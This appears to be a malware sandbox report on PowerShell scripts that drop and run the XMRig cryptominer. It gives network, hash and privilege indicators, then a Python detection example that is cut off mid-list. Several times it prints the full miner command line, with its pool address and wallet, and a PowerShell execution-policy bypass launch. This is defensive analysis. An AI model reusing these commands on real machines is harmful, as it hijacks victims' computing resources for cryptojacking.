"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
GB 184.28.176.112:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 112.176.28.184.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp

Files

memory/4472-0-0x00007FFB3CCB3000-0x00007FFB3CCB5000-memory.dmp

memory/4472-1-0x000002EB2B9D0000-0x000002EB2B9F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ifnfek5s.ho4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4472-11-0x00007FFB3CCB0000-0x00007FFB3D771000-memory.dmp

memory/4472-12-0x00007FFB3CCB0000-0x00007FFB3D771000-memory.dmp

memory/4472-14-0x00007FFB3CCB0000-0x00007FFB3D771000-memory.dmp

memory/4472-15-0x000002EB44990000-0x000002EB449A2000-memory.dmp

memory/4472-16-0x000002EB44980000-0x000002EB4498A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2548-47-0x000001B6A1900000-0x000001B6A1920000-memory.dmp

memory/2548-48-0x000001B6A1940000-0x000001B6A1960000-memory.dmp

memory/2548-49-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-51-0x000001B733FE0000-0x000001B734000000-memory.dmp

memory/2548-50-0x000001B6A1960000-0x000001B6A1980000-memory.dmp

memory/2548-52-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/4472-53-0x00007FFB3CCB0000-0x00007FFB3D771000-memory.dmp

memory/4472-54-0x00007FFB3CCB3000-0x00007FFB3CCB5000-memory.dmp

memory/4472-55-0x00007FFB3CCB0000-0x00007FFB3D771000-memory.dmp

memory/2548-56-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/4472-57-0x00007FFB3CCB0000-0x00007FFB3D771000-memory.dmp

memory/2548-60-0x000001B733FE0000-0x000001B734000000-memory.dmp

memory/2548-59-0x000001B6A1960000-0x000001B6A1980000-memory.dmp

memory/2548-58-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-61-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-62-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-63-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-64-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-65-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-66-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-67-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-68-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-69-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-70-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-71-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-72-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-73-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-74-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-75-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-76-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-77-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-78-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-79-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-80-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-81-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-82-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-83-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-84-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-85-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-86-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-87-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-88-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-89-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-90-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-91-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-92-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-93-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-94-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-95-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-96-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-97-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-98-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-99-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-100-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-101-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-102-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-103-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-104-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-105-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-106-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-107-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-108-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-109-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-110-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-111-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-112-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-113-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-114-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-115-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-116-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-117-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-118-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-119-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:10

Platform

win10-20240404-en

Max time kernel

1792s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/1164-3-0x00007FFEA40A3000-0x00007FFEA40A4000-memory.dmp

memory/1164-5-0x000001FAAB230000-0x000001FAAB252000-memory.dmp

memory/1164-6-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/1164-9-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/1164-10-0x000001FAAB3E0000-0x000001FAAB456000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aq4sctou.a0y.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1164-25-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/1164-29-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/1164-30-0x00007FFEA40A3000-0x00007FFEA40A4000-memory.dmp

memory/1164-31-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/1164-32-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/1164-52-0x000001FAAB3C0000-0x000001FAAB3D2000-memory.dmp

memory/1164-65-0x000001FAAB3A0000-0x000001FAAB3AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2060-94-0x00000265D35C0000-0x00000265D35E0000-memory.dmp

memory/2060-95-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-96-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-97-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-98-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-99-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-100-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-101-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-102-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-103-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-104-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-105-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-106-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-107-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-108-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-109-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-110-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-111-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-112-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-113-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-114-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-115-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-116-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-117-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-118-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-119-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-120-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-121-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-122-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-123-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-124-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-125-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-126-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-127-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-128-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-129-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-130-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-131-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-132-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-133-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-134-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-135-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-136-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-137-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-138-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-139-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-140-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-141-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-142-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-143-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-144-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-145-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-146-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-147-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-148-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-149-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-150-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-151-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-152-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-153-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-154-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-155-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-156-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-157-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:13

Platform

win10-20240404-en

Max time kernel

1792s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

memory/1448-3-0x00007FFE9BC73000-0x00007FFE9BC74000-memory.dmp

memory/1448-5-0x00000238E0260000-0x00000238E0282000-memory.dmp

memory/1448-8-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/1448-9-0x00000238E0420000-0x00000238E0496000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_25juxxwy.i2c.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1448-18-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/1448-25-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/1448-29-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/1448-30-0x00007FFE9BC73000-0x00007FFE9BC74000-memory.dmp

memory/1448-31-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/1448-32-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/1448-52-0x00000238E05C0000-0x00000238E05D2000-memory.dmp

memory/1448-65-0x00000238E05A0000-0x00000238E05AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/360-94-0x000001A272390000-0x000001A2723B0000-memory.dmp

memory/360-{95..157}-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp (63 consecutive dumps of the same region)

Analysis: behavioral25

Detonation Overview

Submitted 2024-07-04 03:15
Reported 2024-07-04 08:14
Platform win10v2004-20240611-en
Max time kernel 1799s
Max time network 1789s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 matches; the report exports no description, indicator, process or target for this rule)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
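The process tree above (PowerShell started with -ExecutionPolicy bypass, then xmrig.exe run from %TEMP% with a pool URL and a Monero address as the pool user) and the SeLockMemoryPrivilege adjustments listed under Signatures are the pieces a detection would key on. The following is an added example, not code from the report or the sandbox: it parses command lines of this shape into IOCs and tags constructed telemetry records. The record schema (type, pid, cmdline, privilege, dhost, dport) and the pool-name hints other than moneroocean are assumptions, not a real Sysmon or EDR schema.

```python
"""Added example (not part of the sandbox report): turn process command lines
and privilege/network observations like the ones in this run into tags.
SAMPLE_EVENTS is constructed to mirror the behavioral25 run; its field names
are assumptions, not a real Sysmon/EDR schema."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Monero standard addresses are 95 base58 chars (alphabet has no 0, O, I, l)
# and start with '4'; subaddresses start with '8'.
MONERO_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
# Only moneroocean is attested by the report; the other hints are assumptions
# drawn from common pool naming.
POOL_HINTS = ("moneroocean", "monero", "xmr", "nanopool", "hashvault", "supportxmr")


@dataclass
class CmdlineFindings:
    image: str
    pool_host: Optional[str] = None
    pool_port: Optional[int] = None
    wallet: Optional[str] = None
    tags: list = field(default_factory=list)


def tokenize(cmdline: str) -> list:
    """Split a Windows command line, keeping quoted paths intact.
    shlex is avoided on purpose: in POSIX mode it eats backslashes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_cmdline(cmdline: str) -> CmdlineFindings:
    toks = tokenize(cmdline)
    f = CmdlineFindings(image=toks[0] if toks else "")
    low = [t.lower() for t in toks]
    for i, tok in enumerate(low):
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if tok in ("-o", "--url") and ":" in nxt:        # xmrig pool argument
            host, _, port = nxt.rpartition(":")
            f.pool_host = host.lower()
            f.pool_port = int(port) if port.isdigit() else None
        elif tok in ("-u", "--user"):                    # xmrig pool user = wallet
            f.wallet = nxt
        elif tok == "-executionpolicy" and nxt.lower() == "bypass":
            f.tags.append("powershell-executionpolicy-bypass")
    if f.wallet and MONERO_ADDR.match(f.wallet):
        f.tags.append("monero-address-as-pool-user")
    if f.pool_host and any(h in f.pool_host for h in POOL_HINTS):
        f.tags.append("known-mining-pool-host")
    img = f.image.lower()
    if "\\appdata\\local\\temp\\" in img and img.endswith(".exe"):
        f.tags.append("exe-run-from-user-temp")
    return f


def score_events(events: list) -> dict:
    """Aggregate tags per PID across process/token/network records."""
    tags: dict = {}
    for ev in events:
        found = []
        if ev["type"] == "process_create":
            found += parse_cmdline(ev["cmdline"]).tags
        elif ev["type"] == "token_adjust" and ev["privilege"] == "SeLockMemoryPrivilege":
            # XMRig enables this right so RandomX can use large pages; almost
            # nothing else in an interactive user session asks for it.
            found.append("selockmemoryprivilege-enabled")
        elif ev["type"] == "network_connect" and any(h in ev["dhost"] for h in POOL_HINTS):
            found.append("connect-to-mining-pool")
        if found:
            tags.setdefault(ev["pid"], []).extend(found)
    return tags


# Constructed records mirroring behavioral25 (PIDs taken from the report's dumps).
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 1568,
     "cmdline": 'powershell.exe -ExecutionPolicy bypass -File '
                '"C:\\Users\\Admin\\AppData\\Local\\Temp\\file01 - copia (9) - copia.ps1"'},
    {"type": "process_create", "pid": 1752,
     "cmdline": '"C:\\Users\\Admin\\AppData\\Local\\Temp\\xmrig-6.21.3\\xmrig.exe" '
                '-o gulf.moneroocean.stream:10128 '
                '-u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF'},
    {"type": "token_adjust", "pid": 1752, "privilege": "SeLockMemoryPrivilege"},
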